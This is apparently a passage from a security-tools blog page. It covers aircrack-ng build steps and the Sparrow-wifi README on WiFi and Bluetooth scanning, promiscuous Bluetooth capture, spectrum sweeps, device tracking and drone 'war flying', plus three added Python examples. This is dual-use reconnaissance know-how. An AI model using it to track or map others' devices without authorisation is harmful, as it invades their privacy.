<li> Compiling on DragonflyBSD with gcrypt using GCC 8<br />
<pre><code>autoreconf -i
env CC=gcc8 CXX=g++8 MAKE=gmake ./configure --with-experimental --with-gcrypt
gmake</code></pre>
</li>
<li> Compiling on OpenBSD (with autoconf 2.69 and automake 1.16)<br />
<pre><code>export AUTOCONF_VERSION=2.69
export AUTOMAKE_VERSION=1.16
autoreconf -i
env MAKE=gmake ./configure
gmake</code></pre>
</li>
<li> Compiling and debugging aircrack-ng<br />
<pre><code>export CFLAGS='-O0 -g'
export CXXFLAGS='-O0 -g'
./configure
make
LD_LIBRARY_PATH=.libs gdb --args ./aircrack-ng [PARAMETERS]</code></pre>
</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Packaging</b></span><br />
Automatic detection of CPU optimization is done at run time. This behavior <strong>is</strong> desirable when packaging Aircrack-ng (for a Linux or other distribution.)<br />
Also, in some cases it may be desirable to provide your own flags completely and not have the suite auto-detect a number of optimizations. To do this, add the additional flag <code>--without-opt</code> to the <code>./configure</code> line:<br />
<code>./configure --without-opt</code><br />
<br />
<span style="font-size: x-large;"><b>Using precompiled binaries</b></span><br />
<br />
<span style="font-size: large;"><b>Linux/BSD</b></span><br />
<ul>
<li>Use your package manager to download aircrack-ng</li>
<li>In most cases, they have an old version.</li>
</ul>
<br />
<span style="font-size: large;"><b>Windows</b></span><br />
<ul>
<li>Install the appropriate "monitor" driver for your card (standard drivers don't work for capturing data).</li>
<li>The aircrack-ng suite consists of command-line tools, so you have to open a command prompt (<code>Start menu -> Run... -> cmd.exe</code>) and then use them from there.</li>
<li>Run the executables without any parameters to have help</li>
</ul>
<br />
<span style="font-size: x-large;"><b>Documentation</b></span><br />
Documentation, tutorials, ... can be found on <a href="https://aircrack-ng.org/" rel="nofollow" target="_blank" title="https://aircrack-ng.org">https://aircrack-ng.org</a><br />
See also manpages and the forum.<br />
For further information check the <a href="https://github.com/aircrack-ng/aircrack-ng/blob/master/README" rel="nofollow" target="_blank" title="README">README</a> file<br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/aircrack-ng/aircrack-ng" rel="nofollow" target="_blank" title="Download Aircrack-Ng">Download Aircrack-Ng</a></span></b></div>
<br />
<span style="font-size: x-large;"><b>Sparrow-Wifi - Next-Gen GUI-based WiFi And Bluetooth Analyzer For Linux</b></span> (published 2019-11-06)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/--ZuFJMevyhU/XbTnZx4pyAI/AAAAAAAAQvM/q0w6oXTauqgGubM4cp2j9HcifEwESgAcwCNcBGAsYHQ/s1600/sparrow-wifi_1_sparrow-screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="838" data-original-width="1440" height="372" src="https://1.bp.blogspot.com/--ZuFJMevyhU/XbTnZx4pyAI/AAAAAAAAQvM/q0w6oXTauqgGubM4cp2j9HcifEwESgAcwCNcBGAsYHQ/s640/sparrow-wifi_1_sparrow-screenshot.png" width="640" /></a></div>
<br />
Sparrow-wifi has been built from the ground up to be the next generation 2.4 GHz and 5 GHz WiFi spectral awareness tool. At its most basic it provides a more comprehensive GUI-based replacement for tools like inSSIDer and linssid that runs specifically on Linux. In its most comprehensive use cases, sparrow-wifi integrates WiFi, software-defined radio (HackRF), advanced Bluetooth tools (traditional and Ubertooth), traditional GPS (via gpsd), and drone/rover GPS via mavlink in one solution.<br />
[NOTE: Check the <a href="https://www.kitploit.com/search/label/Raspberry%20Pi" target="_blank" title="Raspberry Pi">Raspberry Pi</a> section for updates. A setup script is now included to get the project running on Raspbian Stretch.]<br />
Written entirely in Python3, Sparrow-wifi has been designed for the following scenarios:<br />
<ul>
<li>Basic wifi SSID identification</li>
<li>Wifi source hunt - Switch from normal to hunt mode to get multiple samples per second and use the telemetry windows to track a wifi source</li>
<li>2.4 GHz and 5 GHz spectrum view - Overlay spectrums from Ubertooth (2.4 GHz) or HackRF (2.4 GHz and 5 GHz) in real time on top of the wifi spectrum (invaluable in poor connectivity troubleshooting when overlapping wifi doesn't seem to be the cause)</li>
<li>Bluetooth identification - LE advertisement listening with standard bluetooth, full promiscuous mode in LE and classic bluetooth with Ubertooth</li>
<li>Bluetooth source hunt - Track LE advertisement sources or iBeacons with the telemetry window</li>
<li>iBeacon advertisement - Advertise your own iBeacons</li>
<li>Remote operations - An agent is included that provides all of the GUI functionality via a remote agent the GUI can talk to.</li>
<li>Drone/Rover operations - The agent can be run on systems such as a Raspberry Pi and flown on a drone (it's made several flights on a Solo 3DR), or attached to a rover in either GUI-controlled or autonomous scan/record modes.</li>
<li>The remote agent is JSON-based so it can be integrated with other applications</li>
<li>Import/Export - Ability to import and export to/from CSV and JSON for easy integration and revisualization. You can also just run 'iw dev scan', save it to a file and import that as well.</li>
<li>Produce Google maps when GPS coordinates are available for both discovered SSIDs / bluetooth devices or to plot the wifi telemetry over time.</li>
</ul>
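The 'iw dev scan' import mentioned in the list above, as an added example that is not sparrow-wifi's own code: a parser that turns iw's text output into per-BSS records (BSSID, channel, signal, SSID, security class) ready for JSON export. The scan text is constructed to mirror iw's layout, and the record field names are this example's own choice.

```python
"""Parse `iw dev <iface> scan` text into per-BSS records.

Added example, not sparrow-wifi's own importer.  SAMPLE_SCAN is a
constructed imitation of iw's layout: one `BSS` header line per access
point followed by tab-indented attribute lines.
"""
import json
import re
from typing import Dict, List, Optional

# Constructed sample output for two access points (not a real capture).
SAMPLE_SCAN = "\n".join([
    "BSS 00:11:22:33:44:55(on wlan0)",
    "\tTSF: 1234567890 usec (0d, 00:20:34)",
    "\tfreq: 2437",
    "\tbeacon interval: 100 TUs",
    "\tcapability: ESS Privacy ShortSlotTime (0x0411)",
    "\tsignal: -45.00 dBm",
    "\tlast seen: 120 ms ago",
    "\tSSID: HomeNet",
    "\tRSN:\t * Version: 1",
    "\t\t * Group cipher: CCMP",
    "\t\t * Pairwise ciphers: CCMP",
    "\t\t * Authentication suites: PSK",
    "BSS 66:77:88:99:aa:bb(on wlan0) -- associated",
    "\tfreq: 5180.0",
    "\tcapability: ESS (0x0001)",
    "\tsignal: -71.00 dBm",
    "\tSSID: ",                       # hidden network: empty SSID
])

# "BSS <mac>(on <iface>)" with an optional " -- associated" style suffix.
BSS_RE = re.compile(r"^BSS ([0-9a-fA-F:]{17})\(on (\w+)\)(?: -- (.*))?$")


def freq_to_channel(freq_mhz: int) -> Optional[int]:
    """Map a centre frequency to its 802.11 channel; None if out of band."""
    if freq_mhz == 2484:
        return 14
    if 2412 <= freq_mhz <= 2472:
        return (freq_mhz - 2407) // 5
    if 5000 <= freq_mhz <= 5895:
        return (freq_mhz - 5000) // 5
    return None


def _new_record(bssid: str, iface: str, flags: Optional[str]) -> Dict:
    return {"bssid": bssid.lower(), "iface": iface,
            "associated": bool(flags and "associated" in flags),
            "ssid": "", "freq_mhz": None, "channel": None,
            "signal_dbm": None, "security": "open"}


def parse_iw_scan(text: str) -> List[Dict]:
    """Return one dict per BSS block, in the order iw printed them."""
    records: List[Dict] = []
    cur: Optional[Dict] = None
    for line in text.splitlines():
        m = BSS_RE.match(line)
        if m:
            cur = _new_record(*m.groups())
            records.append(cur)
            continue
        if cur is None or not line.startswith("\t"):
            continue                       # stray text before the first BSS
        s = line.strip()
        if s.startswith("freq:"):
            cur["freq_mhz"] = int(float(s[5:]))   # newer iw prints "2437.0"
            cur["channel"] = freq_to_channel(cur["freq_mhz"])
        elif s.startswith("signal:"):
            cur["signal_dbm"] = float(s[7:].split()[0])
        elif s.startswith("SSID:"):
            cur["ssid"] = s[5:].strip()
        elif s.startswith("RSN:"):
            cur["security"] = "WPA2"       # RSN information element present
        elif s.startswith("WPA:") and cur["security"] != "WPA2":
            cur["security"] = "WPA"        # legacy WPA IE without RSN
        elif (s.startswith("capability:") and "Privacy" in s
              and cur["security"] == "open"):
            cur["security"] = "WEP"        # Privacy bit, no WPA/RSN IE (yet)
    return records


def to_json(records: List[Dict]) -> str:
    """Serialise records in a JSON shape an importer can consume."""
    return json.dumps(records, indent=2)


if __name__ == "__main__":
    print(to_json(parse_iw_scan(SAMPLE_SCAN)))
```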
A few sample screenshots. The first is the main window showing a basic wifi scan, the second shows the telemetry/tracking window used for both Wifi and bluetooth tracking.<br />
<div align="center">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-WsnKX3Wj6fA/XbTngbktahI/AAAAAAAAQvQ/iNbmnwYFVpcFK66tp0mUX1VAbqKryNPDACNcBGAsYHQ/s1600/sparrow-wifi_2_telemetry-screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="960" height="418" src="https://1.bp.blogspot.com/-WsnKX3Wj6fA/XbTngbktahI/AAAAAAAAQvQ/iNbmnwYFVpcFK66tp0mUX1VAbqKryNPDACNcBGAsYHQ/s640/sparrow-wifi_2_telemetry-screenshot.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/--ZuFJMevyhU/XbTnZx4pyAI/AAAAAAAAQvM/b7ycS8EhAccwAx3CtWf3mOz1Xr1rc7xwQCEwYBhgL/s1600/sparrow-wifi_1_sparrow-screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="838" data-original-width="1440" height="372" src="https://1.bp.blogspot.com/--ZuFJMevyhU/XbTnZx4pyAI/AAAAAAAAQvM/b7ycS8EhAccwAx3CtWf3mOz1Xr1rc7xwQCEwYBhgL/s640/sparrow-wifi_1_sparrow-screenshot.png" width="640" /></a></div>
</div>
<span style="font-size: large;"><b>Installation</b></span><br />
sparrow-wifi uses python3, qt5, and qtchart for the UI. On a standard Debian variant you may already have python3 and qt5 installed; the only addition needed to run it is qtchart. The following commands should get you up and running with wifi on both Ubuntu and Kali Linux:<br />
<pre><code>sudo apt-get install python3-pip gpsd gpsd-clients python3-tk python3-setuptools
sudo pip3 install QScintilla PyQtChart gps3 dronekit manuf python-dateutil numpy matplotlib</code></pre>
Some folks have been running sparrow with a Python virtualenv. If you'd like to run it in an isolated Python environment, the following sequence should get you up and running:<br />
<pre><code>git clone https://github.com/ghostop14/sparrow-wifi
cd sparrow-wifi
virtualenv --python=python3 $HOME/sparrow
source $HOME/sparrow/bin/activate
pip3 install gps3 python-dateutil requests pyqt5 pyqtchart numpy matplotlib
sudo python3 sparrow-wifi.py</code></pre>
NOTE: If you're trying to run on a Raspberry Pi, see the Raspberry Pi section below. Only the remote agent has been run on a Pi, some of the GUI components wouldn't install / set up on the ARM platform.<br />
<br />
<span style="font-size: large;"><b>Running sparrow-wifi</b></span><br />
Because it needs to use the standard command-line tool 'iw' for wifi scans, you will need to run sparrow-wifi as root. Simply run this from the cloned directory:<br />
<pre><code>sudo ./sparrow-wifi.py</code></pre>
<br />
<span style="font-size: large;"><b>WiFi Notes</b></span><br />
One item of note on wifi scanning, especially in the 5 GHz range, is finding a card that works. It's not so much an issue with the 'iw' tool; however, in more advanced configurations where monitor mode is required, it can be.<br />
<br />
<span style="font-size: large;"><b>Bluetooth</b></span><br />
For folks familiar with WiFi but 'new' to <a href="https://www.kitploit.com/search/label/Bluetooth" target="_blank" title="Bluetooth">Bluetooth</a> scanning, bluetooth is different enough that some of what you may want to see based on wifi won't be available (and may seem a bit frustrating at first). It all fundamentally comes down to how bluetooth operates. Bluetooth uses frequency hopping across the entire 2.4 GHz range, so it doesn't present in nice clean single channel buckets like wifi does. To complicate things there is a low energy (BTLE) and Classic mode that are incompatible from an RF perspective, so generally a bluetooth adapter can only scan for one type or the other at any given time.<br />
Bluetooth devices are also generally only discoverable when advertising (think broadcasting). The only other way to find bluetooth devices is with a device that can sniff all bluetooth packets out of the air, which standard bluetooth adapters don't do. This is where hardware like an Ubertooth comes in to get a better view of the bluetooth environment. And of course, if they're not transmitting you wouldn't have anything to go off of. And if you have to catch packets being transmitted you may need to scan/linger longer to see them, increasing scan frame times to as long as 30 seconds to a minute.<br />
So with all that said, with a standard / built-in bluetooth adapter, Sparrow-wifi can do advertisement scanning for bluetooth low energy (BTLE) devices. If they're advertising their transmit power, it'll attempt a range calculation. This is what the latest iBeacon solutions and products do to be physically locatable. However, with multi-pathing, internal walls, etc., don't expect an extreme level of accuracy. As an added bonus, sparrow-wifi can also advertise its own iBeacons for tracking (this could be useful from a remote agent to turn on location discovery). However, not all bluetooth cards will advertise transmit power, so you may not always get range. If you do have an Ubertooth, sparrow-wifi can use it for promiscuous discovery of both BTLE and classic bluetooth devices. Of course there's a tradeoff. Traditional LE scans update faster for tracking, which is easier for bluetooth 'hunt'; however, promiscuous mode can identify more devices at the expense of needing to linger longer to listen.<br />
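The range calculation from advertised transmit power, as an added example that is not sparrow-wifi's implementation: decode the iBeacon manufacturer-specific data (the public Apple layout) and apply a log-distance path-loss model. The path-loss model with exponent n is an assumption about how such an estimate can be made, and the beacon payload bytes are constructed.

```python
"""Decode an iBeacon advertisement and estimate range from its advertised
1 m reference power.

Added example, not sparrow-wifi's code.  The iBeacon layout is the public
one (Apple manufacturer data, type 0x02, length 0x15); the log-distance
path-loss model is an assumption about how a range estimate can be made,
and SAMPLE_ADV is a constructed payload.
"""
import struct
import uuid
from typing import Iterator, Optional, Tuple

APPLE_COMPANY_ID = 0x004C             # Bluetooth SIG company identifier (Apple)
IBEACON_PREFIX = bytes([0x02, 0x15])  # iBeacon type byte and payload length
AD_MANUFACTURER_SPECIFIC = 0xFF


def ad_structures(payload: bytes) -> Iterator[Tuple[int, bytes]]:
    """Walk the length/type/data structures of a BLE advertising payload."""
    i = 0
    while i < len(payload):
        length = payload[i]
        if length == 0:
            break                            # zero-length padding ends the PDU
        if i + 1 + length > len(payload):
            raise ValueError("truncated AD structure")
        yield payload[i + 1], payload[i + 2:i + 1 + length]
        i += 1 + length


def parse_ibeacon(payload: bytes) -> Optional[dict]:
    """Return uuid/major/minor/tx_power for an iBeacon, else None."""
    for ad_type, data in ad_structures(payload):
        if ad_type != AD_MANUFACTURER_SPECIFIC or len(data) != 25:
            continue
        (company,) = struct.unpack_from("<H", data, 0)   # little-endian company ID
        if company != APPLE_COMPANY_ID or data[2:4] != IBEACON_PREFIX:
            continue
        # UUID (16 bytes) then big-endian major, minor and a signed TX power
        major, minor, tx_power = struct.unpack_from(">HHb", data, 20)
        return {"uuid": str(uuid.UUID(bytes=data[4:20])),
                "major": major, "minor": minor,
                "tx_power_dbm": tx_power}    # measured RSSI at 1 m
    return None


def estimate_distance_m(rssi_dbm: float, tx_power_dbm: int,
                        path_loss_exponent: float = 2.0) -> float:
    """Log-distance path loss: d = 10 ** ((tx_power - rssi) / (10 * n)).

    n = 2.0 is free space; indoors, walls and multipath push n towards
    3-4, which is why a single-sample estimate is only a rough guide.
    """
    return 10 ** ((tx_power_dbm - rssi_dbm) / (10 * path_loss_exponent))


def build_ibeacon_adv(beacon_uuid: uuid.UUID, major: int, minor: int,
                      tx_power_dbm: int) -> bytes:
    """Assemble a 30-byte legacy advertising payload (constructed test data)."""
    mfg = (struct.pack("<H", APPLE_COMPANY_ID) + IBEACON_PREFIX
           + beacon_uuid.bytes + struct.pack(">HHb", major, minor, tx_power_dbm))
    flags = bytes([0x02, 0x01, 0x06])        # Flags AD: LE General Discoverable
    return flags + bytes([len(mfg) + 1, AD_MANUFACTURER_SPECIFIC]) + mfg


# Constructed sample: a beacon advertising -59 dBm measured at 1 m.
SAMPLE_UUID = uuid.UUID("e2c56db5-dffb-48d2-b060-d0f5a71096e0")
SAMPLE_ADV = build_ibeacon_adv(SAMPLE_UUID, major=100, minor=7, tx_power_dbm=-59)


if __name__ == "__main__":
    beacon = parse_ibeacon(SAMPLE_ADV)
    for rssi in (-59, -69, -79):
        d = estimate_distance_m(rssi, beacon["tx_power_dbm"])
        print(f"RSSI {rssi} dBm -> about {d:.1f} m (free-space model)")
```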
If you would like to scan for bluetooth, you'll need a few things:<br />
<ol>
<li>A bluetooth adapter (test with 'hcitool dev' to make sure it shows up). With an adapter you can do basic BTLE advertisement and iBeacon scans.</li>
<li>[Optional ] An Ubertooth for promiscuous discovery scans (BTLE and Classic Bluetooth) <ul>
<li>Ubertooth tools installed and functioning (you can test it with ubertooth-specan-ui)</li>
<li>Blue Hydra installed into /opt/bluetooth/blue_hydra (mkdir /opt/bluetooth && cd /opt/bluetooth && git clone <a href="https://github.com/pwnieexpress/blue_hydra.git" rel="nofollow" target="_blank" title="https://github.com/pwnieexpress/blue_hydra.git">https://github.com/pwnieexpress/blue_hydra.git</a>). Then make sure you've followed the blue_hydra installation instructions. You can test it with bin/blue_hydra. This must be in /opt/bluetooth/blue_hydra or the app won't find it.</li>
</ul>
</li>
</ol>
I strongly recommend running 'hcitool lescan' from the command-line first to make sure everything is working okay. If you have an Ubertooth, run ubertooth-specan-ui and run blue_hydra to make sure those tools work properly before attempting in sparrow-wifi.<br />
Some troubleshooting tips:<br />
<ul>
<li>If you don't see any devices with a basic LE advertisement scan, try "hcitool lescan" from the command-line and see if you get any errors. If so address them there. Sometimes a quick "hciconfig hci0 down && hciconfig hci0 up" can fix it.</li>
<li>If you have an Ubertooth and don't see any spectrum try running ubertooth-specan or ubertooth-specan-ui from the command line. If you get any errors address them there.</li>
</ul>
<br />
<span style="font-size: large;"><b>Spectrum</b></span><br />
Near real-time spectral overlays in both bands is one feature that differentiates sparrow-wifi from other wifi tools. To get spectral overlays, two options are available. The less expensive approach is to use an Ubertooth One; spectrum scanning is one of the features of the hardware, with 1 MHz channel resolution. The downside is that Ubertooth is just focused on the 2.4 GHz spectrum (after all, that's where bluetooth functions), so you won't be able to scan the 5 GHz range. If you have more experience and/or hardware focused on software-defined radio (SDR) and have a HackRF One available, while a little more expensive an option, you can scan both the 2.4 GHz (with 0.5 MHz resolution) and 5 GHz (with 2 MHz resolution) spectrum ranges. The next 2 sections provide some details unique to each hardware device. In general, the goal of sparrow-wifi was frame rates of about 10 fps local and 5 fps via the remote agent (depending on remote hardware and network connectivity).<br />
The following screenshot shows a 2.4 GHz perspective with an Ubertooth spectrum (with 1 MHz bins) overlay. It's quite interesting to watch the spectrum when bluetooth devices are also active. You can observe the bluetooth channel hopping in the spectrum. There are other protocols such as zigbee and other IoT protocols, even cordless phones that may also show up in the 2.4 GHz spectrum that would not otherwise show up on a wifi-only view. Having the spectral overlay provides an invaluable perspective on other interference in the spectrum for troubleshooting say for instance if no overlapping wireless channels seem to be the source of poor connectivity.<br />
<div align="center">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-oPEkaHaTmN4/XbTnm_kybMI/AAAAAAAAQvU/hhvCXwxiIT4vkktjzbEIOCDQVxBwRZHggCNcBGAsYHQ/s1600/sparrow-wifi_3_spectrum-screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="367" data-original-width="705" height="332" src="https://1.bp.blogspot.com/-oPEkaHaTmN4/XbTnm_kybMI/AAAAAAAAQvU/hhvCXwxiIT4vkktjzbEIOCDQVxBwRZHggCNcBGAsYHQ/s640/sparrow-wifi_3_spectrum-screenshot.png" width="640" /></a></div>
</div>
<b>Ubertooth One</b><br />
Once you get an Ubertooth One, the first thing you should do is download and build the latest tools and flash it with the latest firmware version. With that in place, try running ubertooth-specan-ui for a nice quick graphical spectrum display. If this is working, the Ubertooth should work fine in sparrow-wifi (just close any running Ubertooth tools before attempting to display the spectrum). Sparrow-wifi will automatically detect that the Ubertooth is present and the tools are available on startup and enable the appropriate menu choices. Note that if you start sparrow-wifi without the Ubertooth connected, just close sparrow-wifi and reopen it and it should see it. You can manually test it with lsusb to see that the Ubertooth is present.<br />
<br />
<b>HackRF One</b><br />
HackRF support has been added to take advantage of the hackrf_sweep capabilities added to the HackRF firmware. With a HackRF you can sweep the entire range for a view of the spectrum. While hackrf_sweep can sweep from 2.4 GHz through 5 GHz, the frame rate is too slow (like 1 frame every 2 seconds), so you can use it for only one band at a time. With that said, if you have both an Ubertooth and a HackRF, you could use the Ubertooth to display the 2.4 GHz band and the HackRF to display the 5 GHz band simultaneously.<br />
IMPORTANT: Standard RF and antenna rules apply. If you want to monitor either band, make sure you have an antenna capable of receiving in that band (the standard telescoping HackRF antenna probably won't work as it's only rated up to 1 GHz). And if you do want to grab an external dual-band antenna used on wireless cards, just note that the connector polarity is typically reversed (rp-sma rather than the sma connector on the HackRF) so you'll need to grab an adapter to connect it to the HackRF (they're only a couple dollars on Amazon). An RP-SMA antenna will screw on to the SMA connector but the center pin isn't there so you won't actually receive anything. Just a word of caution.<br />
Notes: The 5 GHz spectrum, even with a dual-band antenna, can be difficult to see signals in the same way as in 2.4 GHz. The SNR for 5 GHz seems much lower than 2.4 GHz. Some of this could be attributed to the HackRF, as 5 GHz is getting towards the edge of its usable frequency range, while part of it can also be attributed to 5 GHz not penetrating walls, ceilings, etc. as well as 2.4 GHz does. Sometimes the 5 GHz band shows better in a waterfall plot to distinguish an active signal, but if that's what you need, try the tool qspectrumanalyzer.<br />
Troubleshooting tips:<br />
<ul>
<li>If you don't see any spectrum at all try running hackrf_sweep from the command-line. If you get any errors, address them there.</li>
</ul>
<br />
<span style="font-size: large;"><b>GPS</b></span><br />
Sparrow-wifi relies on gpsd to provide standard GPS communications. During testing there were a number of GPS-related issues worth being aware of. First in terms of GPS receivers, make sure you get one that works with gpsd. I've tested it with a GlobalSAT ND-105C Micro USB receiver. I've also used a GPS app on an android device to provide GPS over bluetooth (although this takes some tinkering, and would preclude using the bluetooth adapter for scanning while using it for GPS).<br />
So the first important note is on the GPS receiver side. If you are planning on using the GPS receiver indoors, you may need to make sure the GPS you get specifically states it will work indoors. Anyone with a Garmin or other outdoor sports GPS system may be aware that they tend to not synchronize with satellites well while indoors. The stock GPS on the Solo 3DR drone is the same way as is the GlobalSAT receiver. When they're close to windows, etc. they may finally sync up after some time, but reception indoors isn't great and if you're in an office building or other metal/concrete structure, the receiver may have a tough time receiving the satellite signals. So keep this in mind when picking a GPS receiver.<br />
In terms of getting the receiver to work with gpsd, there were some challenges that were encountered getting it to work. First, the easiest way to test the gps is to stop the gpsd service (service gpsd stop), and run gpsd from the command-line with debugging enabled. If you have a USB-based GPS you should see a device that looks like /dev/ttyUSB0 show up when it is connected. If that's the case, a command similar to this would start gpsd in the foreground for a quick test:<br />
<pre><code>gpsd -D 2 -N /dev/ttyUSB0</code></pre>
If you see good data, you can daemonize it by just removing the -N parameter. On Ubuntu, editing /etc/default/gpsd and specifically putting /dev/ttyUSB0 in the device parameter and restarting the service worked fine. However on Kali linux and the Raspberry Pi, the same process didn't work as if the gpsd service was ignoring the parameter. In those cases, the GPS service was set to not auto-start and the gpsd daemon was started manually from the command-line with the command 'gpsd /dev/ttyUSB0'.<br />
Once the daemon is up and working, xgps is a tool that's part of the gpsd-clients package that provides a really nice GUI to check GPS and satellite status. If you run xgps it will tell you when the receiver is synchronized and give you a number of other parameters to make sure it is working correctly. If everything looks like it's working with xgps, then sparrow-wifi should be able to pull the data as any other gpsd client would.<br />
<br />
<span style="font-size: large;"><b>Running sparrow-wifi remote agent</b></span><br />
Because the agent has the same <a href="https://www.kitploit.com/search/label/Requirements" target="_blank" title="requirements">requirements</a> as the GUI in terms of system access, you will need to run the agent as root as well. Simply run:<br />
<pre><code>sudo ./sparrowwifiagent.py</code></pre>
By default it will listen on port 8020. There are a number of options that can be seen with --help, and a local configuration file can also be used.<br />
An alternate port can also be specified with:<br />
<pre><code>sudo ./sparrowwifiagent.py --port=&lt;myport&gt;</code></pre>
There are a number of options including IP connection <a href="https://www.kitploit.com/search/label/Restrictions" target="_blank" title="restrictions">restrictions</a> and record-local-on-start. Here's the --help parameter list at this time:<br />
<pre><code>usage: sparrowwifiagent.py [-h] [--port PORT] [--allowedips ALLOWEDIPS]
                           [--mavlinkgps MAVLINKGPS] [--sendannounce]
                           [--userpileds] [--recordinterface RECORDINTERFACE]
                           [--ignorecfg] [--cfgfile CFGFILE]
                           [--delaystart DELAYSTART]

Sparrow-wifi agent

optional arguments:
  -h, --help            show this help message and exit
  --port PORT           Port for HTTP server to listen on
  --allowedips ALLOWEDIPS
                        IP addresses allowed to connect to this agent. Default
                        is any. This can be a comma-separated list for
                        multiple IP addresses
  --mavlinkgps MAVLINKGPS
                        Use Mavlink (drone) for GPS. Options are: '3dr' for a
                        Solo, 'sitl' for local simulator, or full connection
                        string ('udp/tcp:&lt;ip&gt;:&lt;port&gt;' such as:
                        'udp:10.1.1.10:14550')
  --sendannounce        Send a UDP broadcast packet on the specified port to
                        announce presence
  --userpileds          Use RPi LEDs to signal state. Red=GPS
                        [off=None,blinking=Unsynchronized,solid=synchronized],
                        Green=Agent Running [On=Running, blinking=servicing
                        HTTP request]
  --recordinterface RECORDINTERFACE
                        Automatically start recording locally with the given
                        wireless interface (headless mode) in a recordings
                        directory
  --ignorecfg           Don't load any config files (useful for overriding
                        and/or testing)
  --cfgfile CFGFILE     Use the specified config file rather than the default
                        sparrowwifiagent.cfg file
  --delaystart DELAYSTART
                        Wait &lt;delaystart&gt; seconds before initializing</code></pre>
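How an <code>--allowedips</code>-style restriction should behave for an HTTP agent that runs as root, as an added example that is not sparrowwifiagent.py's code: parse the comma-separated list (empty meaning any, the documented default), match each client address against it, and fail closed on anything that does not parse. CIDR entries, the function names and the handler sketch are assumptions; the addresses are constructed.

```python
"""Client-address allow-list of the kind the agent's `--allowedips` option
describes: a comma-separated list, empty meaning any address.

Added example, not sparrowwifiagent.py's code.  Function names, CIDR
support and the handler sketch are assumptions about how such a gate can
be implemented; the sample addresses are constructed.
"""
import ipaddress
from http.server import BaseHTTPRequestHandler
from typing import List, Union

Network = Union[ipaddress.IPv4Network, ipaddress.IPv6Network]


def parse_allowed_ips(spec: str) -> List[Network]:
    """Parse "10.1.1.10,192.168.0.0/24" into a list of networks.

    A bare address becomes a /32 (or /128) network so exact and CIDR
    entries are matched the same way.  Empty or whitespace-only input
    yields an empty list, which is_allowed treats as "any" (the agent's
    documented default).  A malformed entry is a configuration error and
    raises rather than silently widening or narrowing the list.
    """
    allowed: List[Network] = []
    for item in spec.split(","):
        item = item.strip()
        if item:
            allowed.append(ipaddress.ip_network(item, strict=False))
    return allowed


def is_allowed(client_ip: str, allowed: List[Network]) -> bool:
    """Default-any when the list is empty; otherwise deny unless matched.

    A client address that does not parse is denied: an allow-list must
    fail closed, never open, on unexpected input.
    """
    if not allowed:
        return True
    try:
        addr = ipaddress.ip_address(client_ip)
    except ValueError:
        return False
    return any(addr in net for net in allowed)


class AllowListHandler(BaseHTTPRequestHandler):
    """Sketch of where the check belongs: before any request routing."""
    allowed: List[Network] = []          # set from the parsed option at startup

    def do_GET(self) -> None:
        if not is_allowed(self.client_address[0], self.allowed):
            self.send_error(403, "client address not permitted")
            return
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.end_headers()
        self.wfile.write(b'{"status": "ok"}')


if __name__ == "__main__":
    nets = parse_allowed_ips("10.1.1.10, 192.168.0.0/24")
    for ip in ("10.1.1.10", "192.168.0.77", "10.1.1.11", "not-an-ip"):
        print(f"{ip:>14} -> {'allow' if is_allowed(ip, nets) else 'deny'}")
```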
<br />
<span style="font-size: large;"><b>Drone / Rover Operations</b></span><br />
Being able to "war fly" (the drone equivalent of "wardriving" popular in the wifi world) was another goal of the project. As a result, being able to have a lightweight agent that could be run on a small platform such as a Raspberry Pi that could be mounted on a drone was incorporated into the design requirements. The agent has been flown successfully on a Solo 3DR drone (keeping the overall weight under the 350 g payload weight).<br />
The Solo was a perfect choice for the project because the controller acts as a wifi access point and communicates with the drone over a traditional IP network using the mavlink protocol. This allows other devices such as laptops, tablets, and the Raspberry Pi to simply join the controller wifi network and have IP connectivity. This was important for field operations as it kept the operational complexity down.<br />
Because these drones have onboard GPS as part of their basic functionality, it's possible over mavlink (with the help of dronekit) to pull GPS coordinates directly from the drone's GPS. This helps keep the overall payload weight down as an additional GPS receiver does not need to be flown as part of the payload. Also, in order to keep the number of tasks required by the drone operator to a minimum during flight, the agent can be started, wait for the drone GPS to be synchronized, use the Raspberry Pi lights to signal operational readiness, and automatically start recording wifi networks to a local file. The GUI then provides an interface to retrieve those remotely saved files and pull back for visualization.<br />
This scenario has been tested with a Cisco AE1000 dual-band adapter connected to the Pi. Note though that I ran into an issue scanning 5 GHz from the Pi that I finally found the solution for. With a dual-band adapter, if you don't disable the internal Pi wireless adapter you won't get any 5 GHz results (this is a known issue). What you'll need to do is disable the onboard wifi by editing /boot/config.txt and adding the following line, then reboot: 'dtoverlay=pi3-disable-wifi'. Now you'll be able to scan both bands from the Pi.<br />
The quickest way to start the agent on a Raspberry Pi and pull GPS from a Solo drone is to start it with the following command on the Pi (IMPORTANT: see the Raspberry Pi section first; if you're running Raspbian Squeeze, you'll need to build Python 3.5 first (Stretch already has 3.5) to run the agent, since the subprocess calls used were initially removed from python3 and then put back in 3.5):<br />
<pre><code>sudo python3.5 ./sparrowwifiagent.py --userpileds --sendannounce --mavlinkgps 3dr</code></pre>
The Raspberry Pi red and green LED's will then be used as visual indicators transitioning through the following states:<br />
<ol>
<li>Both lights off - Initializing</li>
<li>Red LED Heartbeat - Connected to the drone (dronekit vehicle connect was successful)</li>
<li>Red LED Solid - Connected and GPS synchronized and operational (the drone can take a couple of minutes for the GPS to settle as part of its basic flight initialization)</li>
<li>Green LED Solid - Agent HTTP server is up and the agent is operational and ready to serve requests</li>
</ol>
Note: Without the mavlink setting, if using a local GPS module, the red LED will transition through the same heartbeat=GPS present but unsynchronized, solid = GPS synchronized states.<br />
